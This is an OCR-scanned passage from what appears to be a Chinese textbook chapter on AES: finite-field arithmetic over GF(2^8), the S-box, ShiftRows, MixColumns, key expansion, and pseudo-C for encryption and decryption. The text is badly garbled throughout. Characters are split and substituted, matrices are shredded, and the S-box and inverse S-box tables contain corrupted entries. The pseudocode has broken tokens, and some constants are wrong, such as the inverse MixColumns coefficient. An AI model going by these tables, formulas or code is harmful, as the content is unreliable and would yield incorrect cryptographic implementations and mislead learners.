(4) 逆 元 , 即 对 任意 <cEG, 存 在 一 个 元 素 a-!€EG( 称 为 逆 元 ) ,使 得 a* a 1 一 a”! ， a 一 1。 
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我 们 把 满足 上 面 性 质 的 代数 系统 称 为 群 , 记 做 二 G,* 二。 

若 群 <G,， 二 还 满足 交换 律 , 即 对 任何 ac,OEG 有 : a* 5 一 6，a, 则 称 G 为 交换 群 (或 
加 法 群 . 阿 贝尔 群 等 ) 。 

车 集合 G 中 只 含有 有 限 多 个 元 素 , 则 我 们 称 二 G,，* 二 为 有 限 群 ,此 时 ,把 集合 G 中 元 素 
的 个 数 称 为 有 限 群 G 的 阶 。 

群 的 性 质 有 : 

(1) 群 中 的 单位 元 是 唯一 的 。 

(2) 消去 律 成 立 , 即 对 任意 的 a,6,cEG, 如 果 ab=ac, 则 0 一 c; 如 果 ba 二 ca, 则 b=c。 

(3) 群 中 的 每 一 元 素 的 逆 元 是 唯一 的 。 


2. 有 限 域 


域 是 一 个 代数 系统 , 它 由 一 个 (至 少 包含 两 个 元 素 的 ) 非 空 集合 下 组 成 ,在 集合 下 上 定 
义 有 两 个 二 元 运算 : 加 法 (用 符号 "十" 表示) 与 乘法 (用 符号 *。 ”表示 ,有 时 可 以 将 a…b 简 
写成 a6), 并 满足 下 面条 件 : 
(1) 下 的 元 素 关于 加 法 “十 "成 交换 群 , 记 其 单位 元 为 0( 称 为 域 的 零 元 ) 。 
(2) 下 关于 乘法 “。 ”成 交换 群 , 记 其 单位 元 为 1( 称 其 为 域 的 单位 元 ) 。 
(3) 乘法 在 加 法 上 满足 分 配 律 , 即 对 任意 的 a.6,cEF, 有 
a* (b+ce) = abtac 
(十 0)。c 一 ac 十 pc 
我 们 把 满足 上 面 性 质 的 代数 系统 称 为 域 下 ,并 记 为 一 FF, 十 ,。 二 。 
若 集 合 下 只 包含 有 限 个 元 素 , 则 称 这 个 域 FF 为 有限 域 ,也 称 为 伽 罗 华 域 或 Galois 域 。 
有 限 域 中 元 素 的 个 数 称 为 该 有 限 域 的 阶 。 
车 有 一 任意 的 素数 P 和 正 整数 zxE 2Z+ ,存在 P" 阶 有 限 域 ,这 个 有 限 域 记 为 GF(P")。 
当 "一 1 时 ,有 限 域 GF(P) 称 为 素 域 。 
有 限 域 元 素 表 示 方 法 有 很 多 种 ,而 不 同 的 表示 方法 可 能 带 来 计算 上 效率 的 一 些 差别 。 


域 王 下 ,十 ,。 之 上 并 的 多 项 式 a(z) ,定义 为 a(z) 一 aszr" 十 ar-ix" 十 … 十 aix! +ao( 简 


记 为 az 的 表达 式 ,其 中 EN va va san EF 车 a, 关 0, 称 为 该 多 项 式 的 次 数 ,并 


称 a, 为 首 项 系数 。 首 项 系数 为 一 的 多 项 式 称 为 首 1 多 项 式 。 称 0 为 一 co 次 多 项 式 .其 中 0 和 
1 分 别 为 下 的 零 元 和 单位 元 .F 上 的 xz 的 多 项 式 的 全 体 组 成 的 集合 记 为 FF(z)。 多 项 式 a(x) 
的 次 数 记 为 deg(a(x))。 

域 天 下 ,十 ,。> 上 关于 的 多 项 式 的 加 法 “四 ”和 乘法 “GO” 运 算 定义 如 下 , 设 有 多 项 式 


a(z) 一 ya 和 6(z) 一 Spz', 则 有 
加 法 田 : a(x) 四 6(z) = >) (a + bo) 


乘法 @: a(Cz) @b(zx) = > (> 。 oe 


i=0 \ j=0 
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其 中 ,M = max(m,n) 为 n 和 wm 中 较 大 者 , 当 i 放 nn 时 , 取 a; 一 0; 当 ; 二 妈 时 , 取 访 一 0。 
任何 有 限 域 都 可 以 用 与 它 同 阶 的 多 项 式 域 表示 。 由 于 在 密码 学 中 ,最 常用 的 域 一般 为 素 
域 (限制 n 二 1) 或 者 阶 为 2” 的 有 限 域 。 


3. GF(2") 域 上 的 多 项 式 表示 及 运算 


根据 有 限 域 的 知识 ,一 个 不 可 约 多 项 式 可 以 构成 一 个 有 限 域 .在 AES 加 密 系统 中 ， 
GF (2:) 是 在 不 可 约 多 项 式 m(zx) 一 三 十 习 十 如 十 z 十 1 上 构造 的 有 限 域 一 FFCz)wa ,十 , 之。 

一 个 字 节 的 GF (2 ) 元 素 的 二 进 制 展开 成 的 多 项 式 系数 为 bbebsb463b2b1bo, 即 

brz' 二 bexs 二 bs 十 Bx 十 baz 十 bsx? 十 bix! 十 box? 
例如 ,GF(2 ) 上 的 37( 为 十 六 进 制 ) ,其 二 进 制 为 00110111, 对 应 多 项 式 为 
25 十 z4 十 zz 十 zl 十 1 

下 面 介绍 多 项 式 的 运算 。 

1) 加 法 

加 法 运算 就 是 以 字 节 为 单位 进行 比特 异 或 运算 。 如 十 六 进 制 37 十 83 王 B4, 采 用 二 进 制 
表示 为 00110111 十 10000011 二 10110100; 采用 多 项 式 表 示 为 

(x 十 ZX 十 让 十 ZX 十 1) 十 (x 十 X 十 1) = 二 十 十 x 十 广 ? 

2) 模 运 算 Dy 

多 项 式 模 运 算 与 实数 域 上 的 多 项 式 除法 基本 相同 ,但 采用 以 字 节 retl ] srwtteretl 
为 单位 的 比特 异 或 运算 来 进行 。 如 37 mod(07) 二 01; 采用 多 项 式 运 ee 


算 有 (x 十 x 十 zx? 十 x 十 1)mod(x? 十 x 十 1) 二 1, 这 里 采用 长 除法 进行 Drty 
运算 ,如 图 3-14 所 示 。 | 
3) 乘法 运算 图 3-14 ”多项式 长 除法 
例如 ,57X83 二 C1, 多 项 式 表示 为 
(zw 十 ZX 十 下 十 ZX 十 D(x? 十 x 十 1)mod(m(z)) 
二 (x3 十 zi1 十 zz 十 ZX 十 x 十 十 x 十 十 1) mod 
(十 十 如 十 Zz 十 1) 二 zx? 十 zx' 十 1( 表 示 为 十 六 进 制 为 C1) 
读者 可 以 自己 验算 
《和 填 半 秆 训 证 z 夺 1 十 二 了 二 二 ( 洁 二 2 十 二 十 古 十 村 十 六 十 吉 二 并 十 让 十 1 
4) xz 乘法 运算 


工 乘 以 6(z), 则 有 br 十 box? 十 bs 十 by 十 baz! 十 box 十 bix? 十 box, 再 将 此 式 模 m(xz) 
即 为 所 求 。 这 个 x 乘法 (zx 的 十 六 进 制 为 02) 运 算 相当 于 将 5(zx) 表 示 的 字 节 循环 左 移 一 位 
(如 必 一 0) ,或 将 其 与 11B 比特 异 或 来 实现 。 例 如 ,57X02==AE。 


4. GF(2，)* 域 上 的 多 项 式 表示 及 运算 


在 AES 加 密 系统 中 ,GF(23): 是 在 不 可 约 多 项 式 M(x) 一 zx! 十 1 上 构造 的 有 限 域 ， 
二 F(z)mw , 田 , 因 >。 在 这 个 有 限 域 上 ,一 个 四 个 字 节 的 字 ( 有 32 比特 位 ) 可 以 看 做 是 
GF(25)* 域 上 的 多 项 式 , 每 个 字 对 应 于 一 个 次 数 小 于 4 的 多 项 式 。 

两 个 GF(2:)* 域 上 的 元 素 相 加 时 ,将 这 两 个 元 素 对 应 多 项 式 系数 相 加 即 得 到 结果 , 相 
加 时 采用 比特 异 或 来 实现 。 


信息 
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两 个 GF(2*)* 域 上 的 元 素 相 乘 时 ,要 将 结果 对 一 个 特定 的 多 项 式 取 模 , 以 使 相 乘 后 的 
结果 还 是 一 个 4 字 节 的 向 量 。 这 个 特定 的 多 项 式 为 M(z) 二 x! 十 1。 例 如 ,车 在 GF(2*)* 域 
上 有 两 个 多 项 式 为 : a(z) 王 aszs 十 azz2z 十 aiz 十 ao ,6b(x) 二 bs 十 box 十 bix 十 bo , 则 有 

cz) =a(r) OO) = (cor tesr tortter’ tor tart) mod (M(z)) 

这 里 ,有 cs a * bo Dao * bi; cs =as * bo Da * bi Bao 0 
c3=as * bo Das * hOBDar* brDao bs; c=as * biDas * br,Dar* by; cs—=as * bPas * bs 
由 于 x mod (x 十 1) 二 zm", 上 式 化 简 为 d(x) 二 a(x)@b(z) 二 ds 十 ds 十 dizx 十 do ,其 中 

do=ao bo Bas hh Dab Ba bh;di=a ba bh BabDa. bh 
di; =as* bo Bah Da bs Bas bs; ds=as* bo Pa ha ba .bs 


as °° bs; co—=ao * bo cl 


这 个 变换 用 矩阵 表示 为 
do a as aq ai] [bo 
az) @ bx) = di | a a as bi 
ad az al ao as ||bs 
ds | ad2 a 网 网 


在 AES 加 密 系 统 中 ,采用 一 个 具有 逆 元 的 固定 多 项 式 
az) = {03}z? 二 {01}z? 十 {01}z 十 {02} 
进行 这 样 的 乘法 ,从 而 保证 了 乘法 的 可 逆 性 。 其 逆 元 为 
{06}z3 十 {0d}zx? 十 {09}z 十 {0e} 


| 
T 


am (zr) 
使 得 a(x)@a-!(z)={01}。 
工 乘法 运算 为 
Xx' br) = bax’ chr box bs 
该 式 相当 于 将 b(zx) 所 表示 的 字 左 循环 移 i 位 。 


333 AES 加 密 原理 


AES 为 分 组 密码 体制 , 密 钥 长 度 有 128、192 和 256 位 三 种 ,其 密 钥 长 度 分 别 为 N; 二 4、 
6 和 8 个 32 位 字 。AES 加 密 算 法 的 数据 处 理 单元 是 字 节 ,该 信息 处 理 块 的 长 度 可 为 N, 一 
4.6 和 8 字 。 这 里 介绍 信息 分 组 长 度 为 128 位 (16 字 节 ) ,分 组 的 16 个 字 节 按 顺 序 被 复制 到 
一 个 4X4 的 矩阵 中 , 称 为 状态 矩阵 (State),AES 的 所 有 变换 都 是 基于 状态 的 变换 。AES 
变换 是 由 轮 函数 通过 多 轮 迭 代 实 现 的 ,根据 密 钥 长 度 的 不 同 , 轮 函数 的 迭代 次 数 也 不 一 样 ， 
对 应 上 面 的 三 种 密 钥 长 度 ,迭代 次 数 N, 为 Ne 和 NN 的 函数 ,关系 如 表 3-3 所 示 。 
表 3-3 ”加密 轮 数 N, 的 取 值 


NN, 的 取 值 N,=4 N,=6 N;,=8 
N;=4 10 也 14 
Ni=6 12 下 14 
Ni=8 14 14 14 


轮 函数 的 构成 包括 非 线性 ,扩散 和 密 钥 调 度 几 种 元 素 。 非 线性 变换 的 目的 就 是 通过 较 
小 、 较 简单 的 非 线 性 元 素 得 到 大 的 复杂 化 的 非 线 性 构件 。 在 轮 函 数 的 每 一 轮 迁 代 中 ,包括 四 
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步 变 换 , 分 别 是 字 节 代 换 运算 (ByteSub()), 行 变换 (ShiftRows())、 列 混合 (MixColumns()) 
以 及 轮 密 钥 的 添加 变换 (AddRoundKey()), 其 作用 就 是 通过 重复 简单 的 非 线 性 变换 ,混合 
函数 变换 ,将 字 节 代 换 运算 产生 的 非 线 性 扩散 ,达到 充分 的 混合 ,使 加 密 后 的 分 组 信息 统计 
特性 分 布 更 均匀 ,在 每 轮 和 迭代 中 引入 不 同 的 密 钥 ,这样 便 以 最 简单 的 运算 代价 得 到 最 好 的 加 
密 效 果 ,实现 加 密 的 有 效 性 。 讲 述 AES 加 密 体制 ,用 到 了 一 些 专 用 术语 和 缩写 词 和 运算 符 ， 
为 便于 后 面 的 叙述 ,下 面 分 别 加 以 定义 : 

(1) Ns: 表示 分 组 长 度 , 这 里 取信 息 处 理 块 的 长 度 为 4 个 字 (16 个 字 节 ), 即 N， 一 4。 

(2) Ni: 表示 密 钥 长 度 , 密 钥 长 度 为 4.6 或 者 8 个 字 , 即 N, 一 4.6 或 8。 

(3) N,: 表示 加 密 变换 的 迭代 次 数 ,对 应 密 钥 长 度 为 4.6 或 者 8 个 字 , N. 一 10、12 
或 14。 

(4) Word: 由 32 比特 组 成 的 串 , 既 可 被 看 做 单个 实体 ,也 可 认为 是 由 4 个 字 节 组 成 
的 串 。 

(5) 四 : 在 GF(25)* 域 上 的 两 个 多 项 式 的 乘法 ,方法 见 前 面 所 述 。 

(6) Zz 二 Tozziz6 X127 二 Qoa1"…awaws: 为 初始 输入 的 128 比特 的 信息 ,miEGF(2 )， 
0 过; 和 127, 并 依次 划分 为 16 个 字 节 a; EGF(2s)0 过 i 过 15, 在 每 一 个 字 节 输入 信息 中 ,最 右 
端的 位 为 字 节 低位 ,最 左 端的 位 为 字 节 高 位 。 

(7) y 一 yy yi26y127 二 bob1…busbrs : 为 最 后 输出 的 128 比特 的 加 密 信息 y; EGF(2)， 
0 三 i 和 127, 并 依次 划分 为 16 个 字 节 6b; EGF(2*)*0S<i<15。 

(8) 5s 二 sos1"…*siz6s127 : 为 中 间 状 态 s;: EGF(25)0 过 i 过 127, 从 左 到 右 依 次 平均 划分 为 16 
个 字 节 为 so0 35405520 5 530 5 S01 9 S11 5 S81 5 S81 5 So8 5 S12 9582 5 5825 S08 9S18 95209533 50 EGF(2)4 0 去 i 委 3， 
0 过 j 三 3。 使 用 时 ,将 这 16 个 字 节 转换 成 4X4 状态 矩阵 。 若 N 二 6 或 8, 则 相应 地 将 此 24 
字 节 或 32 字 节 转换 成 4X6 或 4X8 的 输入 信息 和 输出 矩阵 。 这 些 矩 阵 中 ,每 列 为 一 个 字 
Word 长 ,信息 处 理 时 Word 被 看 成 由 4 个 字 节 组 成 的 串 。 

以 上 矩阵 表示 为 

ao as as alz | im So Soz so | bo bs bs bs 
al a5 ao als slo SI 5Sl2 Si bp bo bs 
之 
bs bs bo bu 
| (A 


ds ads ao QH 


ds3 dr aun 415 S30 S31 532 $33 


AES 加 密 算 法 每 一 轮 由 如 下 四 步 操作 构成 。 
1. 字 节 代 换 运算 (SubByte()) 


字 节 代 换 运算 SubByte( ) 为 可 逆 的 非 线性 字 节 代 换 操作 ,操作 元 素 为 单个 字 节 ,对 字 节 
的 操作 遵循 一 个 代 换 表 如 表 3-4 所 示 , 即 S 盒 。S 盒 由 有 限 域 GF (2*) 上 的 乘法 取 逆 和 仿 射 
变换 两 步 构 成 。 

车 4(z)EGF(25), 其 道 为 671(z)EGF(2B3), 则 有 6b(z)*b71(z) 一 1 mod (m(x)), 这 里 
m(z) 二 xz 十 x 十 十 x 十 1。 如 {f6} (十 六 进 制 ) 表 示 为 : x? 十 x 十 x 十 x 十 x? 十 x,{03) 表 
示 为 : x 十 1, 显 然 有 {f6)。{03) 二 1 mod (m(zx))。 实 际 求 逆 采用 设 未知 数 解 方 程 组 的 方法 
来 实现 。 

有 限 域 GF(2*) 上 的 仿 射 变换 也 对 字 节 进行 操作 , 设 输入 字 节 为 (5;66b;b46s5s01bo}) ,经 
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过 仿 射 变换 后 的 输出 字 节 为 {647 闪闪 欠 基 名 负 名 志 则 用 和 矩阵 来 表示 仿 射 变换 表达 式 为 


[2 ] 1 
全 | |， 
0 1 
Lh 
2 | 
网 0 

0 


已 担 呈 普天 吓 书 


© i © 


i 


1 


oOoo- 


ooo - 


1 


一- 


Y 
1 
1 
1 
0 
0 


0 
1 


[%] 1 
[a 
b. 0 
| 国 由 
bs 0 
| 1 


I 


例如 , 求 {f6} 的 SubByte() 变 换 。 先 求 其 逆 为 {03), 即 为 {00000011) ,将 其 代入 上 式 可 
计算 {67 bs 6s bs 63 bz b1 66) 二 {01000010), 即 为 {42)}。 我 们 同样 可 以 用 S 盒 替 换 表 来 实现 
SubByte() 变 换 , 先 取 数 {f6} 的 高 低位 对 应 zy 值 为 x 一 f,y 一 6; 再 查 表 3-4 得 到 第 工行 第 y 
列 (f 行 6 列 ) 的 数值 为 (42}。 这 和 分 步 计算 的 结果 一 样 ,可 以 用 分 步 变 换 来 校对 S 盒 的 正 


确 性 。 


表 3-4 AES 的 S 盒 替换 表 - 字 节 xy 的 代替 表 (用 十 六 进 制 表示 ) 


FA 
0 63 7c 77 7b f2 6b 6f ec5 30 01 67 2b fe d7? ab 76 
1 ca 82 cg9 7d fa 59 47 {0 ad d4 a2 af 9c a4 72 ec0 
2 b7 fd 93 26 36 3f {7 cc 34 a5 e5 fi 71 d8 31 15 
3 04 ec 23 ec3 1]8 96 05 9a 07 12 80 ez eb 27 b2 75 
4 09 83 2c la lb 6c 5a a0 52 3b d6 b3 29 &€3 2f 84 
5 53 dl 00 ed 20 fc bl 5b 6a cb be 39 4a 4c 58 cf 
6 do ed aa fb 43 4d 33 85 45 ft9 02 ?7f 50 3c 9f a8 
7 51 a3 40 8f 92 9d 38 {5 bc b6 da 21 10 ff f3 d2 
8 cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73 
9 60 81 4f dc 22 2a 90 88 46 ee bg 14 de 5e 0b db 
a e0 32 3a 0a 49 06 24 5c c2 da ac 62 91 95 ed 79 
b e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08 
c ba 78 25 2e lc a6 b cb6 e8 dd 74 1f 4b bd 8b 8a 
d 70 3e b5 66 48 03 f Oe 61 35 57 b9 86 cl ld 9e 
d el 和 98 11 69 d49 8e 9%4 9%b le 87 ¢& ce 55 28 df 
3 8c al 89 0d bf e6 42 68 41 99 2d of bo 54 bb 16 


2. 行 移 位 变换 (ShiftRows()) 


行 移 位 变换 ShiftRows() 是 线性 变换 ,其 目的 就 是 使 密码 信息 达到 充分 的 混乱 ,提高 非 
线性 度 。 行 移 位 变换 在 状态 矩阵 State 的 每 行 间 进行 ,对 每 行 实施 左 循环 移动 ,移动 字 节 数 
根据 行 数 和 密 钥 长 度 来 确定 ,第 零 行 不 发 生 偏 移 , 第 一 行 循环 左 移 Ci 字 节 ,第 二 行 移 C* 字 


节 , 第 二 行 移 Cs 字 节 。 表 3-5 为 移动 字 节 数 。 
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表 3-5 行 移 位 变换 字 节 数 


N: CG C: CG 
4 1 2 3 
6 1 2 3 
8 和 3 4 


当 Ns 二 4 时 C==1,C: 一 2,C; 王 3, 行 位 移 变 换 示意 如 图 3-15 所 示 。 


| Soo | Sor | sa | So So | Si | Sa | So3 
So | Si | Sa | Si CEC S| Sa | S53| So 
So | S21 | Sa | $3 [| Sa | 53| 50 | 5, 


So | Sls ss| EE | S$ | $0 | 5 | sa 


图 3-15 ”Ni 二 4 时 行 位 移 变换 示意 


3. 列 混合 变换 (MixColumns()) 


列 混合 是 对 状态 (State) 列 的 一 种 线性 变换 ,状态 每 列 有 四 个 字 节 , 即 一 个 字 (So.;, Si,;， 
Sz,i,Ss,1) ,其 中 0 三 i 二 3 ,So,;,S1i，,Sz,i ,Ss,; 都 是 字 节 。 一 个 字 在 有 限 域 GF(2*)t 上 可 表示 成 
下 面 的 四 项 多 项 式 。 列 变换 就 是 从 状态 中 取出 一 列 ,表示 成 多 项 式 的 形式 S; (xz) 二 S53,:z 十 
Sair2? 十 Sr 十 Su, 再 用 它 乘 以 一 个 固定 的 多 项 式 a(zx) 二 (103) 十 {01}z? 十 {01}z 十 {02)， 
然后 将 所 得 结果 进行 取 模 M(x) 二 x! 十 1 运算 。 在 AES 加 密 算法 中 ,由 于 x! 十 1 不 是 有 限 
域 GF(2)* 上 的 不 可 约 多 项 式 ,因此 ,用 SCz) 乘 以 任意 一 个 四 项 式 的 运算 不 一 定 是 可 逆 的 ， 
于 是 ,将 a(z) 设 置 成 一 个 固定 的 值 ,以 确保 可 进行 求 逆 运算 ,a(Cz) 的 乘法 逆 多 项 式 为 ， 
al1(z) 一 {00}z3 十 {0d)z2z 十 {09}z 十 {0e) 。 

列 混合 的 算术 表达 式 为 : *%(z)=a(Cz)G@s(z)。 这 个 表达 式 用 和 矩阵 可 表示 为 


[5 四 03 01 | so | 


si| |o1 02 03 01||s 
3 01 01 02 03|| sz 
5 las 01 01 al si 


1 1 
S00 Sol So2 So3 


当 Nm 一 4 时 ,有 


1 1 1 
SI0 Sl S12 513 | MixColumns() | S11 Sl2 $513 
or 


We S21 S22 | 
S30 S31 S32 533 


4. 轮 密 钥 的 混合 变换 (AddRoundKey()) 


1 
S10 

1 1 1 

S20 S21 S22 3S23 
1 

3S30 


在 轮 密 钥 混合 变换 中 , 轮 密 钥 的 各 字 节 与 状态 中 的 各 对 应 字 节 分 别 异 或 ,实现 状态 和 密 


钥 的 混合 。 轮 密 钥 由 加 密 密 钥 通过 一 定 的 规则 扩展 产生 ,产生 的 轮 密 钥 总 长 为 N,N, 十 1) 
个 字 ,NN, 为 欠 代 轮 数 ,在 每 一 轮 的 密 钥 混 合 变换 中 ,都 要 从 轮 密 钥 NsCN- 十 1) 中 按 顺 序 依 
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次 取出 N 个 字 与 状态 的 各 字 节 分 别 异 或 。 若 再 次 把 轮 密 钥 和 各 字 节 异 或 便 得 其 逆 运 算 。 
轮 密 钥 的 混合 运算 可 用 下 面 的 式 子 表达 
(S04, 501154) 一 (SuiyStiySzaSaz) 田 (Ko Kui Kas Ks) 0<is 和 3 
其 中 (CKo.i, Ki,i ,Kz,i,Ks,;) 表 示 扩 展 密 钥 中 的 第 rN 十 j 个 字 ,0<r<N,。 在 AES 加 密 过 程 
中 , 轮 密 钥 的 混合 变换 要 实现 N, 十 1 次 ,开始 进行 N, 个 轮 变换 时 要 先 做 一 次 轮 密 钥 混合 变 
换 , 这 样 密 钥 扩 展 的 个 数 应 该 是 Ns(N, 十 1) 个 字 。 当 N, 一 4 时 ,变化 为 
mm sol so "| [> sol so2 pa 
SI0 Sl Sl2 S13 | AddRoundKey() sio 5 si2 S13 
S20 S21 S22 $23 s20 3521 S22 S23 
S30 Sal S32 S33 S30 S31 Sa2 S33 
轮 密 钥 通过 对 密码 密 钥 (原始 密码 ) 扩 展 得 到 长 度 为 N,(N, 十 1) 的 一 维 (4 字 节 ) 字 扩展 
密 钥 数组 。 密 码 密 钥 是 一 个 0 到 4N 一 1 的 一 维 字 节 数组 ; 对 应 密 钥 长 度 为 128 比特 、 
192 比特 和 256 比特 ,数组 长 度 为 16、24 和 32。 在 密 钥 扩展 过 程 中 ,把 扩展 的 密 钥 记 为 
wLNeCN, 十 1)] 它 是 一 个 长 度 为 Ne CN, 十 1) 的 一 维 数组 。 整 个 密 钥 扩展 过 程 的 伪 C 代码 
如 下 : 
KeyExpansion ( byte key[4* Nk])， word w[Nbx (Nr+1)]， Nk) // 用 来 产生 轮 密 钥 w 数组,w 以 
// 字 为 单位 
{ // 原始 密码 key 数组 以 字 节 为 单位 输入 到 函数 中 
word temp; // 定义 一 个 用 来 存放 临时 字 变 量 的 字 
i= 0; 
for (i= 0;i<Nk; it+) // 原始 密码 Key 数组 放 到 前 w[0] - w[Nk - 1], 用 来 密 钥 扩展 
w[i] = Word (key[4*i], key[4*i+1], key[4*i+2], key[4x*i+3]); 
for(i= Nk ;i<Nbx (Nr+1); i++) 
{ // 扩 展 密 钥 , 分 Mk=4 和 6 或 8 两 种 情况 
temp = wLi-1]; 
if (i % Nk == 0) // s$ 表示 整数 的 取 模 运 算 
temp = SubWord ( RotWord (temp ) ) ~ Rcon[ i/ Nk]; //“ 表示 两 个 数 的 按 位 异 或 
else if (Nk == 8 8& (i% Mk == 4) ) // && 表示 两 个 数 的 逻辑 与 运算 
temp = SubWord ( temp ); 
w[i] = wLi- Nk] “~ temp; // 每 次 都 要 进行 异 或 运算 


} 


上 面 的 函数 Word () 用 来 将 一 个 字 的 4 个 字 节 , 按 由 高 到 低 的 顺序 表示 成 一 个 字 ( 高 位 
在 前 )。RotWord() 函 数 将 输入 的 一 个 字 aoaiazas (四 个 字 节 ) ,循环 左 移 一 个 字 节 后 ,重新 
组 成 一 个 字 aazasa 输出 ; SubWord() 函 数 对 输入 的 字 进 行 SubBytes() 变 换 (S 盒 替 换 ) 后 
返回 变换 后 的 字 。 字 数组 Reon[i 由 下 面 的 方法 得 到 : Reon[i] 二 Word(RC[i],{00},{00}， 
{00)) ,其 中 RC[ 癌 为 x 7! 在 GF(2) 域 上 所 代表 的 字 节 数值 。 如 RC[1] 二 01( 为 x" 代表 的 
字 节 数 ),RC[] 二 {02)}。 RC[i 一 1], 这 里 *。 ”为 在 GF(2s) 域 上 的 乘法 。 若 i 二 36, Ni 一 4， 
则 i/N==9, 计 算 RC[9] 为 x? mod ( m(x) ) 一 za mod (zx 十 x 十 x 十 x 十 1) 一 x 十 x 十 
Zz 十 1 所 代表 的 字 节 {10}, 即 有 RC[L8] 二 {16}。 

存在 两 种 特殊 情况 : 
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(1) 对 于 在 N 整数 倍 处 的 密 钥 ,在 异 或 之 前 还 将 对 这 些 字 进行 相应 的 变换 ,具体 见 上 
面 的 实现 过 程 。 

(2) 密 钥 长 度 为 256 比特 (Ni 二 8) 时 的 密 钥 扩展 方案 与 密 钥 长 度 分别 为 128 比特 
(Ni 二 4) 及 192 比特 (Ni 一 6) 时 的 密 钥 扩 展 方案 稍 有 不 同 。 当 Ni 一 8 时 ,如 果 i 一 4 是 N, 
的 整数 倍 , 则 在 进行 异 或 之 前 ,需要 先 对 Subword() 进 行 变换 。 

加 密 原理 的 伪 C 语言 代码 实现 如 下 : 


Cipher (byte in[4* Nb]， byte out[4* Nb]， word w[Nbx* (Nr+1)]) 


{ 


// im、out 为 明文 分 组 输入 和 密 文 分 组 输出 数组 ,w 为 轮 密 钥 数组 


byte State[4, Nb]; // 定义 一 个 状态 矩阵 4x Nb 

State = ini // 装 入 明文 输入 矩阵 到 状态 矩阵 

AddRoundKey (State, w[0] ); // 明文 信息 和 密 钥 混 合 ,使 用 w[0] 开 始 的 Nb 个 密 钥 
for( intr = 1; r<Nr; rt) // 实现 1 到 Nr-1 轮 加 密 变换 


{ SubBytes (State); 
ShiftRows (State); 
MixColumns (State); 
AddRoundKey (State, w[r* Nb]); // 使 用 从 w[r* Nb] 开 始 的 Nb 个 密 钥 
} 
SubBytes (State); // 从 这 里 开始 最 后 一 轮 加 密 变 换 
ShiftRows (State); 
AddRoundKey (State， w[Nrx Nb]); ”// 结束 轮 加 密 变换 ,使 用 w[Nr * Nb] 开 始 的 Nb 个 密 钥 
Out = State; // 将 最 终 的 变化 结果 State 矩阵 , 放 到 密 文 out 矩阵 中 
// 结束 加 密 变 换 , 得 到 密 文 out 矩阵 


334 AES 的 解密 变换 


解密 为 加 密 的 逆 变 换 , 其 伪 C 代码 如 下 : 


InvCipher (byte in[4* Nb], byte out[4* Nb]， word w[Nbx (Nr+1)] ) 


{ 


// in,out 为 密 文 和 明文 分 组 数组 ,w 为 轮 密 钥 数组 


byte State[ 4,Nb]; // 定义 一 个 状态 矩阵 4x Nb 

State = in; // 装 入 密 文 输入 矩阵 到 状态 矩阵 

RddRoundKey (State,w[0] ); // 使 用 w[Nr * Nb] 开 始 的 Nb 个 密 钥 来 解密 Nr 轮 加 密 变换 
InvShiftRows (State); // 实现 ShiftRows 的 逆 变换 

InvSubBytes (State); // 实现 SubBytes 的 道 变换 


for( intr =Nr- 1lir>0ir-- ) // 实现 Nr-1 到 1 轮 的 解密 变换 


} 


AddRoundKey (State,w[r x Nb]); // 使 用 从 w[r* Nbj 开 始 的 Nb 个 密 钥 
InvMixColumns (State); 

InvShiftRows (State); 

InvSubBytes (State); 


RddRoundKey (State,w[ Nr x* Nb]); // 轮 密 钥 混合 变换 得 到 明文 ,使 用 w[0j 开 始 的 好 个 密 钥 
Out = State; // 将 最 终 的 变化 结果 State 矩阵 , 放 到 密 文 out 矩阵 中 


} 


// 结束 加 密 变换 ,得 到 明文 out 矩阵 
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显然 ,解密 变换 为 加 密 变 换 的 逆 变 换 。 加 密 和 解密 密 钥 扩 展 方法 一 样 ,相应 的 逆 变 换 
如 下 。 


1. 逆 字 节 代 换 运 算 (InvSubByte()) 


逆 字 节 代 换 运 算 InvSubByte() 也 遵循 一 个 代 换 表 如 表 3-6 所 示 , 即 逆 S 盒 代 换 表 。 
表 3-6 ”AES 的 送 $ 盒 蔡 换 表 - 字 节 xy 的 代替 表 ( 用 十 六 进 制 表 示 ) 


| 
0 52 09 6a d5 30 36 a5 38 bf 40 a3 9%e 81 的 卉 fb 
1 Te e€e3 39 82 9b 2f ff 87 34 8e 43 44 cd de ee cb 
2 54 7b 94 32 a6 c2 23 3d ee 4c 95 0b 42 fa c3 4e 
3 08 2e al 66 28 d9 24 b2 76 5b a2 49 6d 8b dl 25 
4 72 f8 人 64 86 68 98 16 d4 a4 5c cc 5d 65 bb 92 
5 6c 70 48 50 {fd ed bg da 5e 15 46 57 a7 8d 9d 84 
6 90 d8 ab 00 8 bc d3 0a {7 e4 58 05 b8 b3 45 06 
学 do 2c le 8f ca 3f of 02 cl af bd 03 0l 13 8a 6b 
8 3a 91 11 41 4f 67 dc ea 97 f2 cf ce f0 b4 e 73 
9 96 ac 74 22 e7 ad 35 85 ez {9 37 eg lc 75 df 6e 
a 47 fl la 71 ld 29 ec 89 6f b 62 0e aa 18 be lb 
b fc 56 3e 4b ¢c d2 79 20 9a db co fe 78 cd 5a f{4 
€ lf dd a8 33 88 07 co 31 bl l2 10 59 27 80 ec 下 
d 60 51 7f a9 19 b 4a 0d 2d ¢e5 7a 9f 93 c9 9c ef 
d a0 e0 3b 4d ae 2a {5 bo c8 eb bb 3c 83 53 99 61 
f 17 2b 04 7e ba 77 dd 26 el 69 14 63 55 21 0c 7d 


这 个 道 S 盒 也 由 有 限 域 GF (2) 上 的 仿 射 变换 和 乘法 取道 两 步 构 成 。GF(2) 上 的 基本 
运算 见 上 节 。 有 限 域 GF (2”) 上 的 仿 射 变换 也 对 字 节 进行 操作 , 设 输入 字 节 为 
{51bsbsb4bsb2b1bo) ,经 过 仿 射 变换 后 的 输出 字 节 为 {676565 54 6b 60164), 再 对 输出 字 节 
求 其 在 GF(2*) 域 上 的 逆 元 素 。 这 里 仿 射 变换 用 矩阵 来 表示 其 表达 式 为 


0 LO 0 0 1 
四 i 人 | | | 
的 | es 1| b o| 
网 让 二 网 0 
“| 下 证 到 了 :| je 
的 人 bs L 
bs 人 四 1 
b’ (1 0 A b; 0 


2. 逆行 移 位 变换 (InvShiftRows()) 


逆行 移 位 变换 InvShiftRows() 是 行 移 位 变换 ShiftRows() 的 逆 变 换 。 若 加 密 时 行 移 位 
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变换 中 State 矩阵 的 行 位 移 如 下 : 第 零 行 不 发 生 偏 移 , 第 一 行 循环 左 移 Ci 字 节 ,第 二 行 移 
